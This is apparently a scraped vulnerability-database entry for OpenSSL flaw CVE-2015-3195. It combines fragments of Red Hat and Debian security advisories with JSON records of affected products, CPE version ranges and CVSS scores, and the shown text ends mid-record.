iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .
The References section of this erratum contains a download link (you must log in to download the update). (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)
-
This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
-
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
-
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
-
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
-
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
-
A memory leak flaw was fixed in expat.
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service
-
5 client) - i386, x86_64
-
Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. The Common Vulnerabilities and Exposures project identifies the following issues:
CVE-2015-3194
Loic Jonas Etienne of Qnective AG discovered that the signature
verification routines will crash with a NULL pointer dereference if
presented with an ASN.1 signature using the RSA PSS algorithm and
absent mask generation function parameter. A remote attacker can
exploit this flaw to crash any certificate verification operation
and mount a denial of service attack.
CVE-2015-3196
A race condition flaw in the handling of PSK identify hints was
discovered, potentially leading to a double free of the identify
hint data.
For the oldstable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u18.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u2.
For the unstable distribution (sid), these problems have been fixed in version 1.0.2e-1 or earlier
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0484", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "transportation management", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6.2" }, { "model": "transportation management", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "6.1" }, { "model": "sun ray software", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "11.1" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "1.0" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "2.0" }, { "model": "life sciences data hub", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "2.1" }, { "model": "api gateway", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "api gateway", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "11.1.2.3.0" }, { "model": "1.0.1", "scope": null, "trust": 1.2, "vendor": "openssl", "version": null }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.04" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "15.10" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "6" }, { "model": "vm server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "3.2" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "solaris", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "10" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.1" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "22" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "11.4" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.2" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.0" }, { "model": "mac os x", "scope": "lt", "trust": 1.0, "vendor": "apple", "version": "10.11.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "5" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "10" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "vm virtualbox", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "5.0.14" }, { "model": "http server", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.5.10.2" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zh" }, { "model": "vm virtualbox", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "5.0.0" }, { "model": "integrated lights out manager", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "3.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.2" }, { "model": "integrated lights out manager", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "4.0.4" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "solaris", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "11.3" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "7.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "vm virtualbox", "scope": "lt", "trust": 1.0, "vendor": "oracle", "version": "4.3.36" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.0t" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.53" }, { "model": "hpe systems insight manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "sun blade 6000 ethernet switched nem 24p 10ge", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1.2" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.3" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.55" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 to 10.11.3" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.7.10 and earlier" }, { "model": "hpe server migration pack", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "communications applications", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "of oracle enterprise session border controller ecz7.3m1p4 and earlier" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.28 and earlier" }, { "model": "e-business suite", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.5.10.2" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "none" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1q" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.54" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "4.4.1.5.0" }, { "model": "hpe version control repository manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "12.2.2" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "15.2" }, { "model": "hpe matrix operating environment", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "switch es1-24", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1.3" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0.0.2.0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0.2.0.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "8.4" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0t" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "12.3.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2e" }, { "model": "40g 10g 72/64 ethernet switch", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2.0.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "9.2.0.5" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "15.1" }, { "model": "system management homepage", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "sun network 10ge switch 72p", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1.2" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0.0.1.0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "12.1.4" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "5.0.1.0.0" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "server provisioning" }, { "model": "\u003c0.9.8zh", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "1.0.2", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0s" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0r" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0q" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.0i" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2015-07950" }, { "db": "JVNDB", "id": "JVNDB-2015-006116" }, { "db": "CNNVD", "id": "CNNVD-201512-075" }, { "db": "NVD", "id": "CVE-2015-3195" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.11.4", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:sun_ray_software:11.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:transportation_management:6.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:life_sciences_data_hub:2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:transportation_management:6.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "5.0.14", "versionStartIncluding": "5.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:5:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:vm_server:3.2:*:*:*:*:*:x86:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.3.36", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:http_server:11.5.10.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:integrated_lights_out_manager_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.0.4", "versionStartIncluding": "3.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.9.8zh", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.0t", "versionStartIncluding": "1.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.1q", "versionStartIncluding": "1.0.1", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.0.2e", "versionStartIncluding": "1.0.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-3195" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "139114" }, { "db": "PACKETSTORM", "id": "139116" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "134783" } ], "trust": 0.4 }, "cve": "CVE-2015-3195", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2015-3195", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2015-07950", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-81156", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2015-3195", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 1.4, 